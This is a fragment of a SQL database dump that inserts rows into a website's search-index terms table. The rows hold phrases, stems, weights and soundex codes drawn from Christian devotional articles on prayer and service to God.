(313747, 'relevance by', 'relev by', 0, 1, 1.4, 'R41521', 1, '*'),
(313748, 'relevance by giving', 'relev by giving', 0, 1, 1.6333, 'R415212152', 1, '*'),
(313749, 'responsible for', 'respons for', 0, 1, 1.5, 'R21521416', 1, '*'),
(313750, 'responsible for making', 'respons for making', 0, 1, 1.7333, 'R215214165252', 1, '*'),
(313751, 'rising', 'rise', 0, 0, 0.4, 'R252', 1, '*'),
(313752, 'rising up', 'rise up', 0, 1, 1.3, 'R2521', 1, '*'),
(313753, 'rising up a', 'rise up a', 0, 1, 1.3667, 'R2521', 1, '*'),
(313754, 'satanic', 'satan', 0, 0, 0.4667, 'S352', 1, '*'),
(313755, 'satanic open', 'satan open', 0, 1, 1.4, 'S35215', 1, '*'),
(313756, 'satanic open doors', 'satan open doors', 0, 1, 1.6, 'S35215362', 1, '*'),
(313757, 'says and in', 'sai and in', 0, 1, 1.3667, 'S535', 1, '*'),
(313758, 'see anyone', 'see anyone', 0, 1, 1.3333, 'S500', 1, '*'),
(313759, 'see anyone who', 'see anyone who', 0, 1, 1.4667, 'S500', 1, '*'),
(313760, 'seems so', 'seem so', 0, 1, 1.2667, 'S520', 1, '*'),
(313761, 'seems so foundational', 'seem so foundational', 0, 1, 1.7, 'S5215354', 1, '*'),
(313762, 'seen in the', 'seen in the', 0, 1, 1.3667, 'S530', 1, '*'),
(313763, 'so busy', 'so busy', 0, 1, 1.2333, 'S120', 1, '*'),
(313764, 'so busy during', 'so busy during', 0, 1, 1.4667, 'S123652', 1, '*'),
(313765, 'so busy that', 'so busy that', 0, 1, 1.4, 'S123', 1, '*'),
(313766, 'so foundational', 'so foundational', 0, 1, 1.5, 'S15354', 1, '*'),
(313767, 'so foundational but', 'so foundational but', 0, 1, 1.6333, 'S1535413', 1, '*'),
(313768, 'so that when', 'so that when', 0, 1, 1.4, 'S350', 1, '*'),
(313769, 'solitary', 'solitari', 0, 0, 0.5333, 'S436', 1, '*'),
(313770, 'solitary place', 'solitari place', 0, 1, 1.4667, 'S436142', 1, '*'),
(313771, 'solitary place and', 'solitari place and', 0, 1, 1.6, 'S43614253', 1, '*'),
(313772, 'source of', 'sourc of', 0, 1, 1.3, 'S621', 1, '*'),
(313773, 'source of their', 'sourc of their', 0, 1, 1.5, 'S62136', 1, '*'),
(313774, 'spend in', 'spend in', 0, 1, 1.2667, 'S1535', 1, '*'),
(313775, 'spend in the', 'spend in the', 0, 1, 1.4, 'S15353', 1, '*'),
(313776, 'spend with', 'spend with', 0, 1, 1.3333, 'S153', 1, '*'),
(313777, 'spend with god', 'spend with god', 0, 1, 1.4667, 'S15323', 1, '*'),
(313778, 'spirit but', 'spirit but', 0, 1, 1.3333, 'S16313', 1, '*'),
(313779, 'spirit but in', 'spirit but in', 0, 1, 1.4333, 'S163135', 1, '*'),
(313780, 'sponsor', 'sponsor', 0, 0, 0.4667, 'S1526', 1, '*'),
(313781, 'sponsor you', 'sponsor you', 0, 1, 1.3667, 'S1526', 1, '*'),
(313782, 'sponsor you out', 'sponsor you out', 0, 1, 1.5, 'S15263', 1, '*'),
(313783, 'stability', 'stabil', 0, 0, 0.6, 'S3143', 1, '*'),
(313784, 'stability in', 'stabil in', 0, 1, 1.4, 'S31435', 1, '*'),
(313785, 'stability in your', 'stabil in your', 0, 1, 1.5667, 'S314356', 1, '*'),
(313786, 'strength and', 'strength and', 0, 1, 1.4, 'S3652353', 1, '*'),
(313787, 'strength and achievements', 'strength and achievements', 0, 1, 1.8333, 'S365235321532', 1, '*'),
(313788, 'study that', 'studi that', 0, 1, 1.3333, 'S300', 1, '*'),
(313789, 'study that produces', 'studi that produces', 0, 1, 1.6333, 'S31632', 1, '*'),
(313790, 'substance and', 'substanc and', 0, 1, 1.4333, 'S1235253', 1, '*'),
(313791, 'substance and men', 'substanc and men', 0, 1, 1.5667, 'S12352535', 1, '*'),
(313792, 'supernatural encounters', 'supernatur encounters', 0, 1, 1.7667, 'S165364525362', 1, '*'),
(313793, 'supernatural encounters and', 'supernatur encounters and', 0, 1, 1.9, 'S16536452536253', 1, '*'),
(313794, 'take time in', 'take time in', 0, 1, 1.4, 'T235', 1, '*'),
(313795, 'take time out', 'take time out', 0, 1, 1.4333, 'T2353', 1, '*'),
(313796, 'than those', 'than those', 0, 1, 1.3333, 'T532', 1, '*'),
(313797, 'than those who', 'than those who', 0, 1, 1.4667, 'T532', 1, '*'),
(313798, 'that anointing', 'that anointing', 0, 1, 1.4667, 'T5352', 1, '*'),
(313799, 'that anointing the', 'that anointing the', 0, 1, 1.6, 'T53523', 1, '*'),
(313800, 'that comes upon', 'that comes upon', 0, 1, 1.5, 'T25215', 1, '*'),
(313801, 'that critical', 'that critical', 0, 1, 1.4333, 'T26324', 1, '*'),
(313802, 'that critical appointment', 'that critical appointment', 0, 1, 1.8333, 'T2632415353', 1, '*'),
(313803, 'that grew', 'that grew', 0, 1, 1.3, 'T260', 1, '*'),
(313804, 'that grew to', 'that grew to', 0, 1, 1.4, 'T263', 1, '*'),
(313805, 'that has been', 'that has been', 0, 1, 1.4333, 'T215', 1, '*'),
(313806, 'that is doing', 'that is doing', 0, 1, 1.4333, 'T2352', 1, '*'),
(313807, 'that man will', 'that man will', 0, 1, 1.4333, 'T540', 1, '*'),
(313808, 'that produces stability', 'that produces stability', 0, 1, 1.7667, 'T16323143', 1, '*'),
(313809, 'that when he', 'that when he', 0, 1, 1.4, 'T500', 1, '*'),
(313810, 'that will turn', 'that will turn', 0, 1, 1.4667, 'T4365', 1, '*'),
(313811, 'that you cannot', 'that you cannot', 0, 1, 1.5, 'T253', 1, '*'),
(313812, 'the battle', 'the battle', 0, 1, 1.3333, 'T134', 1, '*'),
(313813, 'the battle to', 'the battle to', 0, 1, 1.4333, 'T1343', 1, '*'),
(313814, 'the busier', 'the busier', 0, 1, 1.3333, 'T126', 1, '*'),
(313815, 'the busier you', 'the busier you', 0, 1, 1.4667, 'T126', 1, '*'),
(313816, 'the christian race', 'the christian race', 0, 1, 1.6, 'T2623562', 1, '*'),
(313817, 'the closet', 'the closet', 0, 1, 1.3333, 'T2423', 1, '*'),
(313818, 'the closet with', 'the closet with', 0, 1, 1.5, 'T2423', 1, '*'),
(313819, 'the course', 'the course', 0, 1, 1.3333, 'T262', 1, '*'),
(313820, 'the course of', 'the course of', 0, 1, 1.4333, 'T2621', 1, '*'),
(313821, 'the day is', 'the day is', 0, 1, 1.3333, 'T200', 1, '*'),
(313822, 'the day take', 'the day take', 0, 1, 1.4, 'T200', 1, '*'),
(313823, 'the devil sponsor', 'the devil sponsor', 0, 1, 1.5667, 'T1421526', 1, '*'),
(313824, 'the enemy can\'t', 'the enemy can', 0, 1, 1.5, 'T5253', 1, '*'),
(313825, 'the father\'s', 'the father', 0, 1, 1.4, 'T1362', 2, '*'),
(313826, 'the father\'s kingdom', 'the father kingdom', 0, 1, 1.6667, 'T13625235', 1, '*'),
(313827, 'the gifts', 'the gifts', 0, 1, 1.3, 'T2132', 2, '*'),
(313828, 'the gifts of', 'the gifts of', 0, 1, 1.4, 'T21321', 2, '*'),
(313829, 'the greatest battle', 'the greatest battle', 0, 1, 1.6333, 'T26323134', 1, '*'),
(313830, 'the lord alone', 'the lord alone', 0, 1, 1.4667, 'T46345', 1, '*'),
(313831, 'the lord have', 'the lord have', 0, 1, 1.4333, 'T4631', 1, '*'),
(313832, 'the manifestation', 'the manifestation', 0, 1, 1.5667, 'T51235', 2, '*'),
(313833, 'the manifestation of', 'the manifestation of', 0, 1, 1.6667, 'T512351', 2, '*'),
(313834, 'the more time', 'the more time', 0, 1, 1.4333, 'T5635', 1, '*'),
(313835, 'the morning hours', 'the morning hours', 0, 1, 1.5667, 'T565262', 1, '*'),
(313836, 'the morning rising', 'the morning rising', 0, 1, 1.6, 'T56526252', 1, '*'),
(313837, 'the night before', 'the night before', 0, 1, 1.5333, 'T52316', 1, '*'),
(313838, 'the night or', 'the night or', 0, 1, 1.4, 'T5236', 1, '*'),
(313839, 'the night to', 'the night to', 0, 1, 1.4, 'T523', 1, '*'),
(313840, 'the past everyone', 'the past everyone', 0, 1, 1.5667, 'T123165', 1, '*'),
(313841, 'the plan', 'the plan', 0, 1, 1.2667, 'T145', 1, '*'),
(313842, 'the plan of', 'the plan of', 0, 1, 1.3667, 'T1451', 1, '*'),
(313843, 'the source', 'the source', 0, 1, 1.3333, 'T262', 1, '*'),
(313844, 'the source of', 'the source of', 0, 1, 1.4333, 'T2621', 1, '*'),
(313845, 'the spirit but', 'the spirit but', 0, 1, 1.4667, 'T216313', 1, '*'),
(313846, 'the time they', 'the time they', 0, 1, 1.4333, 'T530', 1, '*'),
(313847, 'the unquestionable', 'the unquestionable', 0, 1, 1.6, 'T523514', 1, '*'),
(313848, 'the unquestionable and', 'the unquestionable and', 0, 1, 1.7333, 'T52351453', 1, '*'),
(313849, 'the watches', 'the watches', 0, 1, 1.3667, 'T200', 1, '*'),
(313850, 'the watches of', 'the watches of', 0, 1, 1.4667, 'T210', 1, '*'),
(313851, 'their appointments', 'their appointments', 0, 1, 1.6, 'T6153532', 1, '*'),
(313852, 'their appointments with', 'their appointments with', 0, 1, 1.7667, 'T61535323', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(313853, 'their strength', 'their strength', 0, 1, 1.4667, 'T6236523', 1, '*'),
(313854, 'their strength and', 'their strength and', 0, 1, 1.6, 'T623652353', 1, '*'),
(313855, 'them have', 'them have', 0, 1, 1.3, 'T510', 1, '*'),
(313856, 'them have one', 'them have one', 0, 1, 1.4333, 'T515', 1, '*'),
(313857, 'there is the', 'there is the', 0, 1, 1.4, 'T623', 1, '*'),
(313858, 'there prayed”.', 'there prayed”.', 0, 1, 1.4667, 'T6163', 1, '*'),
(313859, 'there prayed”. everyone', 'there prayed”. everyone', 0, 1, 1.7667, 'T6163165', 1, '*'),
(313860, 'they spend', 'thei spend', 0, 1, 1.3333, 'T2153', 1, '*'),
(313861, 'they spend in', 'thei spend in', 0, 1, 1.4333, 'T21535', 1, '*'),
(313862, 'thing in', 'thing in', 0, 1, 1.2667, 'T525', 1, '*'),
(313863, 'thing in common', 'thing in common', 0, 1, 1.5, 'T52525', 1, '*'),
(313864, 'things you must', 'thing you must', 0, 1, 1.5, 'T52523', 1, '*'),
(313865, 'this generation', 'thi generation', 0, 1, 1.5, 'T25635', 1, '*'),
(313866, 'this generation and', 'thi generation and', 0, 1, 1.6333, 'T256353', 1, '*'),
(313867, 'this issue seems', 'thi issue seems', 0, 1, 1.5333, 'T252', 1, '*'),
(313868, 'those personal', 'those personal', 0, 1, 1.4667, 'T216254', 1, '*'),
(313869, 'those personal time', 'those personal time', 0, 1, 1.6333, 'T21625435', 1, '*'),
(313870, 'those things you', 'those things you', 0, 1, 1.5333, 'T2352', 1, '*'),
(313871, 'those who don\'t', 'those who don', 0, 1, 1.5, 'T2353', 1, '*'),
(313872, 'those who keep', 'those who keep', 0, 1, 1.4667, 'T210', 1, '*'),
(313873, 'through the night', 'through the night', 0, 1, 1.5667, 'T623523', 1, '*'),
(313874, 'time for god', 'time for god', 0, 1, 1.4, 'T51623', 1, '*'),
(313875, 'time for personal', 'time for personal', 0, 1, 1.5667, 'T51616254', 1, '*'),
(313876, 'time in the', 'time in the', 0, 1, 1.3667, 'T530', 1, '*'),
(313877, 'time out', 'time out', 0, 1, 1.2667, 'T530', 1, '*'),
(313878, 'time out in', 'time out in', 0, 1, 1.3667, 'T535', 1, '*'),
(313879, 'time they spend', 'time they spend', 0, 1, 1.5, 'T532153', 1, '*'),
(313880, 'time with god', 'time with god', 0, 1, 1.4333, 'T5323', 1, '*'),
(313881, 'time with the', 'time with the', 0, 1, 1.4333, 'T530', 1, '*'),
(313882, 'time you must', 'time you must', 0, 1, 1.4333, 'T523', 1, '*'),
(313883, 'to be men', 'to be men', 0, 1, 1.3, 'T150', 1, '*'),
(313884, 'to come those', 'to come those', 0, 1, 1.4333, 'T2532', 1, '*'),
(313885, 'to keep divine', 'to keep divine', 0, 1, 1.4667, 'T21315', 1, '*'),
(313886, 'to keep your', 'to keep your', 0, 1, 1.4, 'T216', 1, '*'),
(313887, 'to wrestle', 'to wrestle', 0, 1, 1.3333, 'T6234', 1, '*'),
(313888, 'to wrestle with', 'to wrestle with', 0, 1, 1.5, 'T62343', 1, '*'),
(313889, 'to your personal', 'to your personal', 0, 1, 1.5333, 'T616254', 1, '*'),
(313890, 'trivializes', 'trivial', 0, 0, 0.7333, 'T6142', 1, '*'),
(313891, 'trivializes his', 'trivial his', 0, 1, 1.5, 'T6142', 1, '*'),
(313892, 'trivializes his personal', 'trivial his personal', 0, 1, 1.8, 'T614216254', 1, '*'),
(313893, 'turn you', 'turn you', 0, 1, 1.2667, 'T650', 1, '*'),
(313894, 'turn you into', 'turn you into', 0, 1, 1.4333, 'T653', 1, '*'),
(313895, 'undefeatable', 'undefeat', 0, 0, 0.8, 'U531314', 1, '*'),
(313896, 'undefeatable for', 'undefeat for', 0, 1, 1.5333, 'U53131416', 1, '*'),
(313897, 'undefeatable for him', 'undefeat for him', 0, 1, 1.6667, 'U531314165', 1, '*'),
(313898, 'unquestionable', 'unquestion', 0, 0, 0.9333, 'U523514', 1, '*'),
(313899, 'unquestionable and', 'unquestion and', 0, 1, 1.6, 'U52351453', 1, '*'),
(313900, 'unquestionable and irreplaceable', 'unquestion and irreplaceable', 0, 1, 2, 'U52351453614214', 1, '*'),
(313901, 'up a', 'up a', 0, 1, 1.1333, 'U100', 1, '*'),
(313902, 'up a great', 'up a great', 0, 1, 1.3333, 'U1263', 1, '*'),
(313903, 'upon you when', 'upon you when', 0, 1, 1.4333, 'U150', 1, '*'),
(313904, 'verse 35', 'vers 35', 0, 1, 1.2667, 'V620', 1, '*'),
(313905, 'verse 35 says', 'vers 35 says', 0, 1, 1.4333, 'V620', 1, '*'),
(313906, 'violence', 'violenc', 0, 0, 0.5333, 'V452', 1, '*'),
(313907, 'violence forcefully', 'violenc forcefully', 0, 1, 1.6333, 'V45216214', 1, '*'),
(313908, 'violence forcefully advancing', 'violenc forcefully advancing', 0, 1, 1.9667, 'V45216214315252', 1, '*'),
(313909, 'watches', 'watch', 0, 0, 0.4667, 'W320', 1, '*'),
(313910, 'watches of', 'watch of', 0, 1, 1.3333, 'W321', 1, '*'),
(313911, 'watches of the', 'watch of the', 0, 1, 1.4667, 'W3213', 1, '*'),
(313912, 'weak christian', 'weak christian', 0, 1, 1.4667, 'W26235', 1, '*'),
(313913, 'weak christian people', 'weak christian people', 0, 1, 1.7, 'W2623514', 1, '*'),
(313914, 'went out', 'went out', 0, 1, 1.2667, 'W530', 1, '*'),
(313915, 'went out and', 'went out and', 0, 1, 1.4, 'W5353', 1, '*'),
(313916, 'when he shows', 'when he shows', 0, 1, 1.4333, 'W520', 1, '*'),
(313917, 'when the day', 'when the day', 0, 1, 1.4, 'W530', 1, '*'),
(313918, 'when you personally', 'when you personally', 0, 1, 1.6333, 'W516254', 1, '*'),
(313919, 'whenever i', 'whenev i', 0, 1, 1.3333, 'W516', 1, '*'),
(313920, 'whenever i see', 'whenev i see', 0, 1, 1.4667, 'W5162', 1, '*'),
(313921, 'which changed', 'which changed', 0, 1, 1.4333, 'W2523', 1, '*'),
(313922, 'which changed his', 'which changed his', 0, 1, 1.5667, 'W25232', 1, '*'),
(313923, 'while before', 'while before', 0, 1, 1.4, 'W416', 1, '*'),
(313924, 'while before day', 'while before day', 0, 1, 1.5333, 'W4163', 1, '*'),
(313925, 'who don\'t', 'who don', 0, 1, 1.3, 'W353', 1, '*'),
(313926, 'who don\'t as', 'who don as', 0, 1, 1.4, 'W3532', 1, '*'),
(313927, 'who have power', 'who have power', 0, 1, 1.4667, 'W160', 1, '*'),
(313928, 'who keep', 'who keep', 0, 1, 1.2667, 'W210', 1, '*'),
(313929, 'who keep their', 'who keep their', 0, 1, 1.4667, 'W2136', 1, '*'),
(313930, 'who trivializes', 'who trivializes', 0, 1, 1.5, 'W36142', 1, '*'),
(313931, 'who trivializes his', 'who trivializes his', 0, 1, 1.6333, 'W36142', 1, '*'),
(313932, 'will become undefeatable', 'will become undefeatable', 0, 1, 1.8, 'W412531314', 1, '*'),
(313933, 'will face', 'will face', 0, 1, 1.3, 'W412', 1, '*'),
(313934, 'will face will', 'will face will', 0, 1, 1.4667, 'W4124', 1, '*'),
(313935, 'will go far', 'will go far', 0, 1, 1.3667, 'W4216', 1, '*'),
(313936, 'will not go', 'will not go', 0, 1, 1.3667, 'W4532', 1, '*'),
(313937, 'will turn you', 'will turn you', 0, 1, 1.4333, 'W4365', 1, '*'),
(313938, 'with god alone', 'with god alone', 0, 1, 1.4667, 'W32345', 1, '*'),
(313939, 'with god don\'t', 'with god don', 0, 1, 1.4667, 'W32353', 1, '*'),
(313940, 'with god except', 'with god except', 0, 1, 1.5, 'W323213', 1, '*'),
(313941, 'with god from', 'with god from', 0, 1, 1.4333, 'W323165', 1, '*'),
(313942, 'with god have', 'with god have', 0, 1, 1.4333, 'W3231', 1, '*'),
(313943, 'with god he', 'with god he', 0, 1, 1.3667, 'W323', 1, '*'),
(313944, 'with god i', 'with god i', 0, 1, 1.3333, 'W323', 1, '*'),
(313945, 'with god in', 'with god in', 0, 1, 1.3667, 'W3235', 1, '*'),
(313946, 'with god take', 'with god take', 0, 1, 1.4333, 'W3232', 1, '*'),
(313947, 'with god this', 'with god this', 0, 1, 1.4333, 'W3232', 1, '*'),
(313948, 'with god those', 'with god those', 0, 1, 1.4667, 'W3232', 1, '*'),
(313949, 'with god whenever', 'with god whenever', 0, 1, 1.5667, 'W323516', 1, '*'),
(313950, 'with god which', 'with god which', 0, 1, 1.4667, 'W3232', 1, '*'),
(313951, 'with god you', 'with god you', 0, 1, 1.4, 'W323', 1, '*'),
(313952, 'worth men', 'worth men', 0, 1, 1.3, 'W635', 1, '*'),
(313953, 'worth men of', 'worth men of', 0, 1, 1.4, 'W6351', 1, '*'),
(313954, 'wrestle with', 'wrestl with', 0, 1, 1.4, 'W62343', 1, '*'),
(313955, 'wrestle with god', 'wrestl with god', 0, 1, 1.5333, 'W6234323', 1, '*'),
(313956, 'yet to come', 'yet to come', 0, 1, 1.3667, 'Y325', 1, '*'),
(313957, 'you become the', 'you become the', 0, 1, 1.4667, 'Y1253', 1, '*'),
(313958, 'you cannot even', 'you cannot even', 0, 1, 1.5, 'Y25315', 1, '*'),
(313959, 'you get so', 'you get so', 0, 1, 1.3333, 'Y232', 1, '*'),
(313960, 'you get the', 'you get the', 0, 1, 1.3667, 'Y230', 1, '*'),
(313961, 'you keep your', 'you keep your', 0, 1, 1.4333, 'Y216', 1, '*'),
(313962, 'you make out', 'you make out', 0, 1, 1.4, 'Y523', 1, '*'),
(313963, 'you must guard', 'you must guard', 0, 1, 1.4667, 'Y523263', 1, '*'),
(313964, 'you personally and', 'you personally and', 0, 1, 1.6, 'Y1625453', 1, '*'),
(313965, 'you satanic', 'you satanic', 0, 1, 1.3667, 'Y2352', 1, '*'),
(313966, 'you satanic open', 'you satanic open', 0, 1, 1.5333, 'Y235215', 1, '*'),
(313967, 'you so', 'you so', 0, 1, 1.2, 'Y200', 1, '*'),
(313968, 'you so busy', 'you so busy', 0, 1, 1.3667, 'Y212', 1, '*'),
(313969, 'you when', 'you when', 0, 1, 1.2667, 'Y500', 1, '*'),
(313970, 'you when you', 'you when you', 0, 1, 1.4, 'Y500', 1, '*'),
(313971, 'you will become', 'you will become', 0, 1, 1.5, 'Y4125', 1, '*'),
(313972, 'you will face', 'you will face', 0, 1, 1.4333, 'Y412', 1, '*'),
(313973, 'your appointment', 'your appointment', 0, 1, 1.5333, 'Y615353', 1, '*'),
(313974, 'your appointment with', 'your appointment with', 0, 1, 1.7, 'Y615353', 1, '*'),
(313975, 'your appointments', 'your appointments', 0, 1, 1.5667, 'Y6153532', 1, '*'),
(313976, 'your appointments daily', 'your appointments daily', 0, 1, 1.7667, 'Y615353234', 1, '*'),
(313977, 'your appointments with', 'your appointments with', 0, 1, 1.7333, 'Y61535323', 1, '*'),
(313978, 'your personal appointment', 'your personal appointment', 0, 1, 1.8333, 'Y61625415353', 1, '*'),
(313979, 'your personal appointments', 'your personal appointments', 0, 1, 1.8667, 'Y616254153532', 1, '*'),
(315284, '02 07', '02 07', 0, 1, 1.1667, '', 1, '*'),
(315285, '02 07 2017', '02 07 2017', 0, 1, 1.3333, '', 1, '*'),
(315286, '10 says cursed', '10 says cursed', 0, 1, 1.4667, 'S623', 1, '*'),
(315287, '10 vs', '10 vs', 0, 1, 1.1667, 'V200', 1, '*'),
(315288, '10 vs 12', '10 vs 12', 0, 1, 1.2667, 'V200', 1, '*'),
(315289, '12 says and', '12 says and', 0, 1, 1.3667, 'S530', 1, '*'),
(315290, '48 vs', '48 vs', 0, 1, 1.1667, 'V200', 1, '*'),
(315291, '48 vs 10', '48 vs 10', 0, 1, 1.2667, 'V200', 1, '*'),
(315292, '56 don', '56 don', 0, 1, 1.2, 'D500', 1, '*'),
(315293, '56 don t', '56 don t', 0, 1, 1.2667, 'D530', 1, '*'),
(315294, 'a favour', 'a favour', 0, 1, 1.2667, 'A160', 1, '*'),
(315295, 'a favour serve', 'a favour serve', 0, 1, 1.4667, 'A16261', 1, '*'),
(315296, 'a serious', 'a serious', 0, 1, 1.3, 'A262', 1, '*'),
(315297, 'a serious god', 'a serious god', 0, 1, 1.4333, 'A2623', 1, '*'),
(315298, 'a very costly', 'a very costly', 0, 1, 1.4333, 'A16234', 1, '*'),
(315299, 'aaron', 'aaron', 0, 0, 0.3333, 'A650', 1, '*'),
(315300, 'aaron understood', 'aaron understood', 0, 1, 1.5333, 'A653623', 1, '*'),
(315301, 'aaron understood that', 'aaron understood that', 0, 1, 1.7, 'A653623', 1, '*'),
(315302, 'abel', 'abel', 0, 0, 0.2667, 'A140', 1, '*'),
(315303, 'abel god', 'abel god', 0, 1, 1.2667, 'A1423', 1, '*'),
(315304, 'abel god accepted', 'abel god accepted', 0, 1, 1.5667, 'A1423213', 1, '*'),
(315305, 'abel\'s', 'abel', 0, 0, 0.4, 'A142', 1, '*'),
(315306, 'abel\'s offering', 'abel offering', 0, 1, 1.5, 'A1421652', 1, '*'),
(315307, 'abel\'s offering and', 'abel offering and', 0, 1, 1.6333, 'A142165253', 1, '*'),
(315308, 'accept careless', 'accept careless', 0, 1, 1.5, 'A2132642', 1, '*'),
(315309, 'accept careless attitude', 'accept careless attitude', 0, 1, 1.8, 'A21326423', 1, '*'),
(315310, 'accept just', 'accept just', 0, 1, 1.3667, 'A21323', 1, '*'),
(315311, 'accept just anything', 'accept just anything', 0, 1, 1.6667, 'A213235352', 1, '*'),
(315312, 'accept wrong', 'accept wrong', 0, 1, 1.4, 'A213652', 1, '*'),
(315313, 'accept wrong and', 'accept wrong and', 0, 1, 1.5333, 'A21365253', 1, '*'),
(315314, 'accepted abel\'s', 'accept abel', 0, 1, 1.5, 'A213142', 1, '*'),
(315315, 'accepted abel\'s offering', 'accept abel offering', 0, 1, 1.8, 'A2131421652', 1, '*'),
(315316, 'accepts', 'accept', 0, 0, 0.4667, 'A2132', 1, '*'),
(315317, 'accepts god', 'accept god', 0, 1, 1.3667, 'A21323', 1, '*'),
(315318, 'accepts god hates', 'accept god hates', 0, 1, 1.5667, 'A213232', 1, '*'),
(315319, 'ago my', 'ago my', 0, 1, 1.2, 'A250', 1, '*'),
(315320, 'ago my son', 'ago my son', 0, 1, 1.3333, 'A2525', 1, '*'),
(315321, 'all his ways', 'all his ways', 0, 1, 1.4, 'A420', 1, '*'),
(315322, 'all their heart', 'all their heart', 0, 1, 1.5, 'A4363', 1, '*'),
(315323, 'all thy', 'all thy', 0, 1, 1.2333, 'A430', 1, '*'),
(315324, 'all thy heart', 'all thy heart', 0, 1, 1.4333, 'A4363', 1, '*'),
(315325, 'all thy soul.”', 'all thy soul.”', 0, 1, 1.4667, 'A4324', 1, '*'),
(315326, 'all your possession', 'all your possession', 0, 1, 1.6333, 'A46125', 1, '*'),
(315327, 'always wants', 'alwai wants', 0, 1, 1.4, 'A42532', 1, '*'),
(315328, 'always wants the', 'alwai wants the', 0, 1, 1.5333, 'A425323', 1, '*'),
(315329, 'am a serious', 'am a serious', 0, 1, 1.4, 'A5262', 1, '*'),
(315330, 'and attitude with', 'and attitude with', 0, 1, 1.5667, 'A530', 1, '*'),
(315331, 'and cursed', 'and cursed', 0, 1, 1.3333, 'A532623', 1, '*'),
(315332, 'and cursed be', 'and cursed be', 0, 1, 1.4333, 'A5326231', 1, '*'),
(315333, 'and every capacity', 'and every capacity', 0, 1, 1.6, 'A53162123', 1, '*'),
(315334, 'and he smote', 'and he smote', 0, 1, 1.4, 'A53253', 1, '*'),
(315335, 'and mediocre', 'and mediocre', 0, 1, 1.4, 'A535326', 1, '*'),
(315336, 'and mediocre service', 'and mediocre service', 0, 1, 1.6667, 'A5353262612', 1, '*'),
(315337, 'and now israel', 'and now israel', 0, 1, 1.4667, 'A535264', 1, '*'),
(315338, 'and order', 'and order', 0, 1, 1.3, 'A53636', 2, '*'),
(315339, 'and order he', 'and order he', 0, 1, 1.4, 'A53636', 1, '*'),
(315340, 'and rejected', 'and rejected', 0, 1, 1.4, 'A53623', 1, '*'),
(315341, 'and rejected cain\'s', 'and rejected cain', 0, 1, 1.6333, 'A53623252', 1, '*'),
(315342, 'and soul don\'t', 'and soul don', 0, 1, 1.4667, 'A5324353', 1, '*'),
(315343, 'and specifics', 'and specifics', 0, 1, 1.4333, 'A5321212', 1, '*'),
(315344, 'and specifics he', 'and specifics he', 0, 1, 1.5333, 'A5321212', 1, '*'),
(315345, 'and specifics of', 'and specifics of', 0, 1, 1.5333, 'A53212121', 1, '*'),
(315346, 'and standard', 'and standard', 0, 1, 1.4, 'A53235363', 1, '*'),
(315347, 'and standard so', 'and standard so', 0, 1, 1.5, 'A532353632', 1, '*'),
(315348, 'and to love', 'and to love', 0, 1, 1.3667, 'A5341', 1, '*'),
(315349, 'and to serve', 'and to serve', 0, 1, 1.4, 'A53261', 1, '*'),
(315350, 'and with all', 'and with all', 0, 1, 1.4, 'A534', 1, '*'),
(315351, 'any man god', 'ani man god', 0, 1, 1.3667, 'A523', 1, '*'),
(315352, 'any service', 'ani service', 0, 1, 1.3667, 'A52612', 1, '*'),
(315353, 'any service not', 'ani service not', 0, 1, 1.5, 'A5261253', 1, '*'),
(315354, 'any service that', 'ani service that', 0, 1, 1.5333, 'A526123', 1, '*'),
(315355, 'anyhow', 'anyhow', 0, 0, 0.4, 'A500', 1, '*'),
(315356, 'anyhow god', 'anyhow god', 0, 1, 1.3333, 'A523', 1, '*'),
(315357, 'anyhow god wants', 'anyhow god wants', 0, 1, 1.5333, 'A523532', 1, '*'),
(315358, 'anyhow one', 'anyhow one', 0, 1, 1.3333, 'A500', 1, '*'),
(315359, 'anyhow one of', 'anyhow one of', 0, 1, 1.4333, 'A510', 1, '*'),
(315360, 'anyhow that', 'anyhow that', 0, 1, 1.3667, 'A530', 1, '*'),
(315361, 'anyhow that was', 'anyhow that was', 0, 1, 1.5, 'A532', 1, '*'),
(315362, 'anything serving', 'anyth serving', 0, 1, 1.5333, 'A53526152', 1, '*'),
(315363, 'anything serving god', 'anyth serving god', 0, 1, 1.6667, 'A535261523', 1, '*'),
(315364, 'are bringing', 'ar bringing', 0, 1, 1.4, 'A6165252', 1, '*'),
(315365, 'are bringing to', 'ar bringing to', 0, 1, 1.5, 'A61652523', 1, '*'),
(315366, 'are doing him', 'ar doing him', 0, 1, 1.4333, 'A63525', 1, '*'),
(315367, 'as if', 'as if', 0, 1, 1.1667, 'A210', 1, '*'),
(315368, 'as if they', 'as if they', 0, 1, 1.3333, 'A213', 1, '*'),
(315369, 'at his demands', 'at his demands', 0, 1, 1.4667, 'A323532', 1, '*'),
(315370, 'at our', 'at our', 0, 1, 1.2, 'A360', 1, '*'),
(315371, 'at our own', 'at our own', 0, 1, 1.3333, 'A365', 1, '*'),
(315372, 'at the highest', 'at the highest', 0, 1, 1.4667, 'A323', 1, '*'),
(315373, 'at your own', 'at your own', 0, 1, 1.3667, 'A365', 1, '*'),
(315374, 'attitude in', 'attitud in', 0, 1, 1.3667, 'A350', 1, '*'),
(315375, 'attitude in service', 'attitud in service', 0, 1, 1.6333, 'A352612', 1, '*'),
(315376, 'attitude with', 'attitud with', 0, 1, 1.4333, 'A300', 1, '*'),
(315377, 'attitude with which', 'attitud with which', 0, 1, 1.6333, 'A320', 1, '*'),
(315378, 'back his', 'back his', 0, 1, 1.2667, 'B200', 1, '*'),
(315379, 'back his sword', 'back his sword', 0, 1, 1.4667, 'B263', 1, '*'),
(315380, 'be he', 'be he', 0, 1, 1.1667, 'B000', 1, '*'),
(315381, 'be he that', 'be he that', 0, 1, 1.3333, 'B300', 1, '*'),
(315382, 'be served', 'be served', 0, 1, 1.3, 'B2613', 1, '*'),
(315383, 'be served anyhow', 'be served anyhow', 0, 1, 1.5333, 'B26135', 1, '*'),
(315384, 'beloved jeremiah', 'belov jeremiah', 0, 1, 1.5333, 'B413265', 1, '*'),
(315385, 'beloved jeremiah 48', 'belov jeremiah 48', 0, 1, 1.6333, 'B413265', 1, '*'),
(315386, 'best it', 'best it', 0, 1, 1.2333, 'B230', 1, '*'),
(315387, 'best it is', 'best it is', 0, 1, 1.3333, 'B232', 1, '*'),
(315388, 'better not', 'better not', 0, 1, 1.3333, 'B3653', 1, '*'),
(315389, 'better not to', 'better not to', 0, 1, 1.4333, 'B3653', 1, '*'),
(315390, 'bible is', 'bibl is', 0, 1, 1.2667, 'B420', 1, '*'),
(315391, 'bible is the', 'bibl is the', 0, 1, 1.4, 'B423', 1, '*'),
